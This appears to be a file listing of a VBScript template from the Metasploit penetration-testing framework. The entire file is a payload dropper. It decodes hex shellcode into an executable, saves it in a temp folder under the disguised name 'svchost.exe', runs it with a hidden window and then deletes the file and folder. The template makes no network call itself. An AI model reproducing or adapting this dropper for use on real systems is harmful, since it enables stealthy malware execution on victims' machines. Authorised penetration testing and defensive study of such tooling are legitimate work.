metasploit-framework/data/templates/scripts/to_exe.vbs.template

27 lines
866 B
Plaintext
Raw Normal View History

2013-08-20 23:52:58 +00:00
Function %{var_func}()
2013-10-18 17:59:30 +00:00
%{var_shellcode} = "%{var_hex_shellcode}"
2013-08-20 23:52:58 +00:00
Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
Dim %{var_stream}
Dim %{var_tempdir}
Dim %{var_tempexe}
Dim %{var_basedir}
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
%{var_obj}.CreateFolder(%{var_basedir})
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
2013-10-18 17:59:30 +00:00
For i = 1 to Len(%{var_shellcode}) Step 2
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
Next
2013-08-20 23:52:58 +00:00
%{var_stream}.Close
Dim %{var_shell}
Set %{var_shell} = CreateObject("Wscript.Shell")
%{var_shell}.run %{var_tempexe}, 0, true
%{var_obj}.DeleteFile(%{var_tempexe})
%{var_obj}.DeleteFolder(%{var_basedir})
End Function
%{init}